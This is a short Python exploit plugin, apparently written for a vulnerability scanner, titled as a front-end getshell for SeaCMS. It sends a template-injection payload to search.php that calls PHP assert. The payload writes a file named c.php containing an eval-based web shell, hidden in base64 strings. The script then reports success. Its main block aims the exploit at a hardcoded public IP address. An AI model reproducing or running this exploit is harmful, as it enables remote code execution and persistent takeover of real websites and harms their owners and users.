#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Generated by ptools
#_PlugName_ = seacms最新版前台getshell
#__Refer___ = https://0day5.com/archives/4249
import re
import urllib


def assign(service, arg):
    if service == fingerprint.seacms:
        return True, arg
def audit(arg):
    payload = '/search.php?searchtype=5'

    target = arg + payload

    payload1 = 'searchword=d&order=}{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end if}&func=assert&cmd=fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29;'
    code, head, res, final_url, log= hackhttp.http(target, post=payload1)
    if "200" in code:
        print "SUCCESS"
    else:
        print "Failed"
if __name__ == '__main__':
    from dummy import *
    audit(assign(fingerprint.seacms, "http://120.24.86.145:8008")[1])